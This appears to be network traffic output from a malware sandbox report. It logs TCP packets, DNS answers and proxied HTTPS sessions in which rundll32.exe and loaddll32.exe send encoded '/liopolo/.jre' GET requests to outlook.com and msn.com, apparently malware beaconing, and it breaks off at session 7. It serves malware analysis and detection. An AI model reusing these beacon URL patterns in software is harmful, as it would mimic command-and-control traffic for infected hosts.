Oct 12, 2021 00:38:46.635082960 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.635184050 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.636074066 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.636096954 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.733916998 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.734044075 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.737009048 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.737025023 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.737360001 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.739736080 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.767653942 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.767720938 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.767815113 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.768023014 CEST  49807        443        192.168.2.4    52.97.183.162
Oct 12, 2021 00:38:46.768037081 CEST  443          49807      52.97.183.162  192.168.2.4
Oct 12, 2021 00:38:46.796379089 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.796427965 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.796536922 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.797328949 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.797353029 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.887511969 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.887612104 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.892256975 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.892277002 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.892529011 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.895700932 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.939138889 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.957782030 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.957911968 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:46.957983971 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.958444118 CEST  49808        443        192.168.2.4    52.97.218.82
Oct 12, 2021 00:38:46.958467007 CEST  443          49808      52.97.218.82   192.168.2.4
Oct 12, 2021 00:38:52.762846947 CEST  49809        443        192.168.2.4    40.97.153.146
Oct 12, 2021 00:38:52.762887001 CEST  443          49809      40.97.153.146  192.168.2.4
Oct 12, 2021 00:38:52.762998104 CEST  49809        443        192.168.2.4    40.97.153.146
Oct 12, 2021 00:38:52.763700008 CEST  49809        443        192.168.2.4    40.97.153.146
Oct 12, 2021 00:38:52.763951063 CEST  443          49809      40.97.153.146  192.168.2.4
Oct 12, 2021 00:38:53.094397068 CEST  443          49809      40.97.153.146  192.168.2.4
Oct 12, 2021 00:38:53.094536066 CEST  49809        443        192.168.2.4    40.97.153.146
Oct 12, 2021 00:38:53.099283934 CEST  49809        443        192.168.2.4    40.97.153.146
Oct 12, 2021 00:38:53.099319935 CEST  443          49809      40.97.153.146  192.168.2.4
Oct 12, 2021 00:38:53.099530935 CEST  443          49809      40.97.153.146  192.168.2.4

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                        Oct 12, 2021 00:40:16.011079073 CEST8.8.8.8192.168.2.40x8b0cNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• msn.com
• outlook.com
• www.outlook.com
• outlook.office365.com

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49776 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:04 UTC | 0 | OUT | GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 22:38:04 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:38:04 GMT
Connection: close
Content-Length: 373
2021-10-11 22:38:04 UTC | 0 | IN | Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 33 31 50 6c 61 5f 32 42 43 58 74 65 69 2f 31 52 5f 32 42 59 36 4f 2f 78 56 38 59 30 50 65 50 6f 45 78 73 4b 76 64 52 73 41 72 4c 6a 4d 54 2f 30 48 59 39 65 77 47 6c 34 64 2f 52 54 68 37 56 34 73 79 30 42 53 48 5f 32 42 74 6c 2f 39 73 71 4b 32 33 70 7a 57 31 78 59 2f 6b 50 54 36 6c 6d 76 47 59 4c 77 2f 43 66 32 49 4f 52 32 66 68 5a 54 79 4e 4c 2f
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49779 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:11 UTC | 1 | OUT | GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 22:38:11 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 22:38:11 GMT
Connection: close
Content-Length: 377
2021-10-11 22:38:11 UTC | 2 | IN | Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 4e 74 5a 67 67 71 78 49 58 32 45 46 39 77 5f 32 2f 42 61 76 54 51 30 6a 48 6b 38 7a 37 32 45 30 2f 6d 72 41 5f 32 42 4e 6f 35 66 47 66 31 38 71 53 35 33 2f 47 49 68 41 34 46 4e 70 63 2f 71 49 51 62 4a 56 6b 78 4c 48 70 49 78 33 4c 7a 4a 63 59 46 2f 33 75 51 7a 33 50 67 49 43 35 50 6a 6e 64 79 37 76 42 48 2f 69 5f 32 46 4f 61 6f 4b 36 70 55 7a 71
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzq


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49860 | 40.97.153.146 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:40:08 UTC | 14 | OUT | GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 22:40:08 UTC | 14 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
Server: Microsoft-IIS/10.0
request-id: 448417ac-9aed-bf6f-b902-bf5f92a7f6fb
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: BN6PR2001CA0022
X-RequestId: 0a3dbc15-af9f-42a8-9d5e-2a0de062e8b5
MS-CV: rBeERO2ab7+5Ar9fkqf2+w.0
X-Powered-By: ASP.NET
X-FEServer: BN6PR2001CA0022
Date: Mon, 11 Oct 2021 22:40:08 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49861 | 52.98.207.194 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:40:08 UTC | 15 | OUT | GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 22:40:08 UTC | 15 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
Server: Microsoft-IIS/10.0
request-id: 6f503dd6-681b-92e6-0e33-05fdd79ea39d
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AS9PR0301CA0009
X-RequestId: 5f53b19c-6d27-4c9c-b051-e6d331879eab
MS-CV: 1j1Qbxto5pIOMwX9156jnQ.0
X-Powered-By: ASP.NET
X-FEServer: AS9PR0301CA0009
Date: Mon, 11 Oct 2021 22:40:08 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49862 | 40.101.124.226 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:40:08 UTC | 16 | OUT | GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 22:40:08 UTC | 16 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: bd6df30b-3506-0654-39aa-09111fc341ce
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Alt-Svc: h3=":443",h3-29=":443"
X-CalculatedFETarget: VI1PR07CU008.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COM
X-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1
X-FEServer: VI1PR07CA0252
X-Powered-By: ASP.NET
X-FEServer: AM5PR0101CA0012
Date: Mon, 11 Oct 2021 22:40:08 GMT
Connection: close
2021-10-11 22:40:08 UTC | 17 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49806 | 40.97.116.82 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:46 UTC | 2 | OUT | GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 22:38:46 UTC | 2 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
Server: Microsoft-IIS/10.0
request-id: d3c10e4c-5e49-3a6f-0bca-0aa8eeb05a44
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR13CA0010
X-RequestId: dd82cfc2-7512-45b0-82e8-afbaf83fa8be
MS-CV: TA7B00lebzoLygqo7rBaRA.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR13CA0010
Date: Mon, 11 Oct 2021 22:38:46 GMT
Connection: close
Content-Length: 0


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49807 | Destination IP: 52.97.183.162 | Destination Port: 443 | Process: C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:46 UTC | 3 | OUT | GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: www.outlook.com
2021-10-11 22:38:46 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
  Cache-Control: no-cache
  Pragma: no-cache
  Location: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
  Server: Microsoft-IIS/10.0
  request-id: 4827db24-f7db-9519-6b3d-e535d1121fb8
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-FEServer: AM7PR03CA0018
  X-RequestId: f1bbbeb9-c424-4847-91c0-206d8d6abcc1
  MS-CV: JNsnSNv3GZVrPeU10RIfuA.0
  X-Powered-By: ASP.NET
  X-FEServer: AM7PR03CA0018
  Date: Mon, 11 Oct 2021 22:38:46 GMT
  Connection: close
  Content-Length: 0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49808 | Destination IP: 52.97.218.82 | Destination Port: 443 | Process: C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:46 UTC | 4 | OUT | GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.office365.com
2021-10-11 22:38:46 UTC | 5 | IN | HTTP/1.1 404 Not Found
  Content-Length: 1245
  Content-Type: text/html
  Server: Microsoft-IIS/10.0
  request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-CalculatedFETarget: VI1PR0102CU003.internal.outlook.com
  X-BackEndHttpStatus: 404
  X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COM
  X-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.com
  X-BackEndHttpStatus: 404
  X-RUM-Validated: 1
  X-Proxy-RoutingCorrectness: 1
  X-Proxy-BackendServerStatus: 404
  MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1
  X-FEServer: VI1PR0102CA0087
  X-Powered-By: ASP.NET
  X-FEServer: AS8PR04CA0081
  Date: Mon, 11 Oct 2021 22:38:46 GMT
  Connection: close
2021-10-11 22:38:46 UTC | 5 | IN | Data (ASCII): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49809 | Destination IP: 40.97.153.146 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:53 UTC | 7 | OUT | GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: outlook.com
2021-10-11 22:38:53 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
  Cache-Control: no-cache
  Pragma: no-cache
  Location: https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
  Server: Microsoft-IIS/10.0
  request-id: 556c818d-51ec-ad8d-c23c-618ef38fd56c
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-FEServer: BN6PR2001CA0003
  X-RequestId: d6343e44-52af-49e0-aabf-9bf1bd538048
  MS-CV: jYFsVexRja3CPGGO84/VbA.0
  X-Powered-By: ASP.NET
  X-FEServer: BN6PR2001CA0003
  Date: Mon, 11 Oct 2021 22:38:52 GMT
  Connection: close
  Content-Length: 0


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49810 | Destination IP: 52.97.218.66 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:53 UTC | 8 | OUT | GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: www.outlook.com
2021-10-11 22:38:53 UTC | 8 | IN | HTTP/1.1 301 Moved Permanently
  Cache-Control: no-cache
  Pragma: no-cache
  Location: https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
  Server: Microsoft-IIS/10.0
  request-id: fa41d79f-b084-e275-06fd-7c804baa2baf
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-FEServer: AS8PR04CA0017
  X-RequestId: 5790813c-b01e-46a4-ac89-6c67c15fc018
  MS-CV: n9dB+oSwdeIG/XyAS6orrw.0
  X-Powered-By: ASP.NET
  X-FEServer: AS8PR04CA0017
  Date: Mon, 11 Oct 2021 22:38:52 GMT
  Connection: close
  Content-Length: 0


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49811 | Destination IP: 52.97.137.210 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
